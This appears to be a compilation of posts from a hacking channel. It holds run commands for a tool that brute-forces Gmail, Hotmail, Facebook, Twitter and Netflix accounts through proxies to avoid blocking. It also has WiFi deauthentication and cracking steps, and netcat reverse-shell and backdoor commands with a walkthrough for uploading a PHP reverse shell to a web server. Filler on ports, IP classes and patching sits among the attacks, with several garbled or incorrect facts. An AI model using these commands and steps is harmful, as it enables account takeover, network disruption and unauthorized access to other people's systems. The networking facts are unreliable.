▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑HACK GMAIL/netflix..... BRUTEFORCE ✅ :
T.me/UndercodeTesting

🦑 𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ :

1) git clone https://github.com/Matrix07ksa/Brute_Force.git

2) cd Brute_Force

3) sudo apt install python3 python3-pip

pip3 install proxylist

pip3 install mechanize

4) BruteForce Gmail Attack
python3 Brute_Force.py -g Account@gmail.com -l File_list

python3 Brute_Force.py -g Account@gmail.com -p Password_Single

> BruteForce Hotmail Attack
python3 Brute_Force.py -t Account@hotmail.com -l File_list

python3 Brute_Force.py -t Account@hotmail.com -p Password_Single

> BruteForce Twitter Attack
python3 Brute_Force.py -T Account_Twitter -l File_list
python3 Brute_Force.py -T Account_Twitter -l File_list -X proxy-list.txt
BruteForce Facebook Attack
python3 Brute_Force.py -f Account_facebook -l File_list
python3 Brute_Force.py -f Account_facebook -l File_list -X proxy-list.txt

> BruteForce Netflix Attack

Start On Vpn/proxies list > prevent blocking ...
python3 Brute_Force.py -n Account_Netflix -l File_list
python3 Brute_Force.py -n Account_Netflix -l File_list -X proxy-list.txt


▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑SMB server remote code execution vulnerability

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Intranet WSUS service-How it work ?


1) Applicable objects: All computers that have joined the intranet Active Directory domain, or have manually set up access to the intranet WSUS service (administrators can download the service configuration script)

2) For users in non-technical departments, the system can be set to automatically download and install the required security patches at regular intervals. Users only need to restart the computer as prompted.

3) For users in other departments, the system can be set to automatically download the required security patches and prompt installation, and users can follow the prompts to install and restart the system.

4) If you want to install the patch as soon as possible, the user can restart the computer once.

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑SMB server remote code execution vulnerability

> Microsoft Update Service

1) Applicable objects: All computers that cannot use the intranet WSUS service, including computers that do not have the intranet WSUS service enabled, and computers that have the intranet WSUS service enabled but are not connected to the intranet.

2) For computers that have not enabled the WSUS service on the intranet, users need to ensure that Windows automatic updates are enabled, follow the prompts to install patches and restart the computer

3) For computers with the intranet WSUS service enabled but not connected to the intranet, users need to click the Start menu-All Programs-windowsupdate, click "Check online for updates from windows update" and follow the prompts.

🦑 A computer can be specified with multiple IP addresses, and through a specific technology, multiple servers can share an IP address.

> Each interface in the Internet must have a unique IP address, divided into five categories:
Class A is reserved for the government and consists of a 1-byte network address and a 3-byte host address. The highest bit of the network address must be 0 ; The address range is 1.0.0.1 ~ 126.255.255.254

> Class B medium-sized companies, 2 bytes network address, 2 bytes host address, the highest bit of the network address must be 10,128.0.0.1 ~ 223.255.255.254
Class C is assigned to need The highest bit of the person must be 110
192.0.0.1 ~ 239.255.255.254

> Class D is used for multicast. The first byte starts with 1110. It is a specially reserved address and does not point to a specific network. Class E is used for experiments;

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑ANY HACKER MUST KNOW THIS :
instagram.com/UndercodeTesting

1) Ports, ports in the hardware field are interfaces. The port in the software field generally refers to the communication protocol port for connection service and connectionless service in the network. It is an abstract software structure, including some data structures and io buffers. The port here specifically refers to the port in tcp / ip. Logical port.

2) Classification,
port distribution
Well-known port, 0-1023 is tightly bound to some specific services, which clearly indicates
the protocol of a certain service. It is not possible to redefine the
registration port of the role object. For many other purposes, different programs can be defined by themselves as needed.

> Dynamic and / or private ports, 49152-65535, theoretically should not assign common services to these ports. Easy to conceal.
Protocol type

> TCP port and UDP port, the two protocols are independent of each other, and the port number is also independent of

> TCP common ports: FTP file transfer protocol, port 21, download and upload files
Telnet: remote login port, can provide a communication service based on DOS mode , 23, the previous BBS

> SMTP, a simple mail transfer protocol, 25
POP3: corresponds to SMTP, used to receive mail, usually POP3 protocol using 110
as long as there is a corresponding program that uses the POP3 protocol, you can log in to the mailbox interface without web. Instead, use a mail program to accept mail directly.
UDP commonly used ports: HTTP hypertext transfer protocol, open 80 to provide services on the computer that provides web page resources.

> DNS: used for domain name resolution services, domain name and IP conversion, 53
SNMP: Simple Network Management Protocol, 161, used to manage network equipment, because there are many network equipment, so connectionless services can show advantages.

> QQ: The program both accepts and provides services. The connectionless protocol is UDP. The QQ server uses 8000 to listen for incoming messages, and 4000 sends out text messages

> TO VIiew the port. You can use some tools to master the port usage. You can use Netstat
scan in Windows . Open ports are important

🦑Routing: The activity of moving information from a source location to a target location through a linked network. During the routing process, information will pass through at least one or more intermediate nodes.

> Router: The main node equipment of the Internet. The router determines the data forwarding through routing. The forwarding strategy is called routing. The interconnection hub of different networks, the router system has become the main context based on TCP / IP.

> Gateway: Inter-network connector, protocol converter, the most complex network interconnection device, only used for the interconnection of two networks with different high-level protocols. The gateway can be used for WAN interconnection or local area network, using different communication protocols. The data format or language, or even between two systems with completely different architectures, the gateway is a translator. The gateway to connect two networks.
Routing and gateway

> Gateway refers to the gateway under the TCP / IP protocol cluster. The gateway is essentially the IP address of one network leading to another network. If the host A finds that the target of the data is not in the local network, it sends the data to its own gateway. , Sent to the gateway of B, and then forwarded to the host.

> Ping is only available when IP is installed. Sending data packets and receiving response information, the local host and the remote host must exchange a large number of data packets to trust the correctness of the IP.
// dos command learning
intrusion method

> data-driven attacks, illegal use of system files, forgery of information attacks
against information protocol weaknesses, remote manipulation,
retransmission attacks using system administrator's error attacks, attacks on ICMP messages, targeting original path options Vulnerability attacks
Ethernet broadcast attacks, hopping attacks, stealing TCP protocol links, and taking control of the
system.

> System vulnerabilities refer to flaws in the logical design of application software or operating systems or errors in writing. Human reasons, objective reasons, hardware reasons
Information collection, the first step in collecting information is to obtain an IP address, if you are in a local area network, you need to obtain the DSN server
ping URL of the domain where the machine is located to obtain the website IP
nslookup DNS server
IP location query website IP138 whois in the domain where the machine is located can also find
vulnerabilities in the website registration information monitoring system.

> The scanner is a program that automatically detects security weaknesses in remote or local hosts. By using the scanner, users can leave no traces To discover the allocation of various TCP ports of remote servers, the services provided and their software versions.
How it works: By selecting remote TCP / IP different port services and recording the answers given by the target, a lot of information about the target host is collected.

written by undercode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 usefull hacking tips

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 You can take three steps to protect your Android device :
t.me/undercodeTesting

1) SSL encryption of the device: SSL is one of the best ways to protect sensitive data in transit.

2) Test third-party apps: Try to install apps from first-party vendors such as Google. If you do purchase the application from a third-party store, please use the mobile security vendor to audit the security / authenticity of any third-party code / library used in the mobile application. Read the permissions required by the application before downloading. An example of a permission application that can request a potentially dangerous signal is to allow disclosure of your identity or location or send mail to the Internet.

3) Be wary of SMS Trojan horses: implement control measures to prevent unauthorized access to paid resources. If you request payment via SMS, please proceed with caution.

written by undercode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑what is Hijacker ?

> Hijacker is a penetration testing tool with a graphical user interface. The tool integrates several well-known WiFi penetration tools, such as Aircrack-ng, Airodump-ng, MDK3, Reaver, etc. Hijacker provides a simple and easy-to-use UI interface, users do not have to manually enter commands or copy and paste MAC addresses on the console.

> This application is only available in the Android version (ARM) and requires the device to have a wireless network card that supports Monitor Mode. Currently only a few devices are eligible, so you may need to use custom firmware

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Hack wifi steps

A) information collection

1. View available WiFi hotspots around, including hidden hotspots;
2. View specific network and client activities by analyzing signals and data packets;
3. Count hotspot confidence;
4. View manufacturer information of hotspot devices;
5. View device signals Strength;
6. Save the captured data packet (.cap file);


B) Wireless attack

1. De-
authenticate (
drop ) all clients of a specific / non-specific network; 2. De- authenticate ( drop ) of specific clients; 3. Launch MDK3 beacon flood attacks with specific options;
4 Do MDK3 identity authentication DoS attacks against specific networks or users;
5. Capture WPA handshake packets and crack WEP networks;
6. Reaver WPS crack attacks;


C) other

1. Copy command or MAC address to clipboard;
2. Integrate dependent components without manual installation;
3. Integrate nexmon driver and related management components;
4. Use custom dictionary to crack .cap file;
5. Use parameter to filter wireless Hotspots;
6. Export all collected information to files;

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑BEST WIFI HACKING TOOLS :
t.me/UndercodeTesting

1) http://www.aircrack-ng.org/

2) http://sourceforge.net/projects/airsnort/

3) http://www.oxid.it/cain.html

4) http://www.kismetwireless.net/

5) http://www.stumbler.net/

6) http://www.inssider.com/

7) https://www.wireshark.org/

8) http://sourceforge.net/projects/cowpatty/

9) http://sourceforge.net/projects/airjack/

10) http://wepattack.sourceforge.net/

11) http://www.wildpackets.com/products/distributed_network_analysis/omnipeek_network_analyzer

12) http://www.tamos.com/products/commwifi/

13) https://crack.sh/

14) https://github.com/FluxionNetwork/fluxion

written by undercode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Anti-malware tools: key features comparison


Pro trial period (d) > Menu
languages > Real-time
protection Scheduling Quarantine

Malwarebytes 14 26 ✔️ ✔️ ✔️

HitmanPro 30 20 ✔️ ✔️ ✔️

Emsisoft 30 19 ✔️ ✔️ ✔️

AVG 30 22 ✔️ ✔️ ✔️

Spybot Search & Destroy N/A 7 ✘ ✔️ ✔️

Windows MSRT N/A 25 ✘ ✘ ✘

iolo System Defense 30 8 ✔️ ✔️ ✔️

Zemana Antimalware 30 41 ✔️ ✔️ ✔️

Comodo Free Antivirus N/A 27 ✔️ ✘ ✔️

Avast Free Antivirus 60 1 ✔️ ✔️ ✔️

GridinSoft Anti-Malware N/A 26 ✔️ ✔️ ✔️

IObit Malware Fighter 30 32 ✔️ ✘ ✔️

Xvirus Anti-Malware N/A 14 ✔️ ✔️ ✔️

STOPzilla 15 2 ✔️ ✔️ ✔️

Malware Killer N/A 1 ✘ ✘ ✔️

Kaspersky Internet Security 30 14 ✔️ ✔️ ✔️

Trend Micro Internet Security 30 20 ✔️ ✔️ ✔️

Norton Security 30 17 ✔️ ✔️ ✔️

Total Defense Antivirus 30 1 ✔️ ✔️ ✔️

RogueKiller Anti-malware N/A 6 ✘ ✔️ ✔️

@UndercodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Penetration test tool tutorial: How to use the > Netcat (nc.exe), Netcat actual combat tutorial by undercode :

🦑 WHAT IS NETCAT (kali-parrot tool ) ?

Netcat is very easy and versatile at the same time, like trying to explain everything you can do with a Swiss army knife.
To give some examples:-

1) Get logo

2) Bind the shell (backdoor)

3) to chat with

4) File upload and download

5) Port scan

6) Knock on the port

7) Forwarding port

8) Display web server HTTP file content

9) When you type nc -h in the terminal of kali Linux , there are many options in netcat to enhance its functions and effects. Before diving into the details of its work, you must know that here we use two systems, one as the attacker and the other as the target system.

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How to use netcat ? Knocking Port (Port blasting)

1) open kali Linux terminal and type the following command, which contains the IP and port number of the target goal.
nc 192.168.1.21 2222

2) Therefore, when a given command is executed, it will tell the hidden running service by tapping on the port, as can be seen from the image given below that port 2222 is open for SSH.

🦑 Anti-shelling is

1) mainly an attacker using netcat as a backdoor for unauthorized access to the target system, where the attacker activates the listening port (random port) when scanning any vulnerable targets.

2) nc-e/bin/bash192.168.1.214444 Theabove command will wait for the reverse connection of the victim's system. In the given screenshot, you can see that the running website suffered from the os command injection vulnerability. Now use nc -e / bin / bash 192.168.1.21 4444 to establish a connection between the victim and the attacker system, which will allow Create backdoors for unauthorized access.

🦑Netcat as a backdoor :

download netcat.exe for windows and enter the following command

> nc.exe 192.168.1.21 4444 -e cmd.exe

> nc -lvp 4444

written by undercode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑REVERSE SHELL & File upload exploitation
We will understand how an attacker can exploit a file upload vulnerability through the netcat shell. It is clear from the given images that the target web server allows its clients to upload images.
youtube.com/undercode

🦑𝕃𝔼𝕋'𝕊 𝕊𝕋𝔸ℝ𝕋 :


1) For uploading, we use php-reverse-shell.php instead of the php backdoor image. Open this web shell to edit the listener IP, which is your kali Linux IP (192.168.1.21), and then use the following command to activate netcat, which will wait for the reverse connection to be established with the victim system.
nc -lvp 1234

2) For uploading, we use php-reverse-shell.php instead of the php backdoor image. Open this web shell to edit the listener IP, which is your kali Linux IP (192.168.1.21), and then use the following command to activate netcat, which will wait for the reverse connection to be established with the victim system.
nc -lvp 1234

3) Now upload your php backdoor on the web server and execute the file connecting the victim's system from the attacker's machine.

4) Therefore, you can see that the attacker successfully made unauthorized access through the netcat shell.

written by undercode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁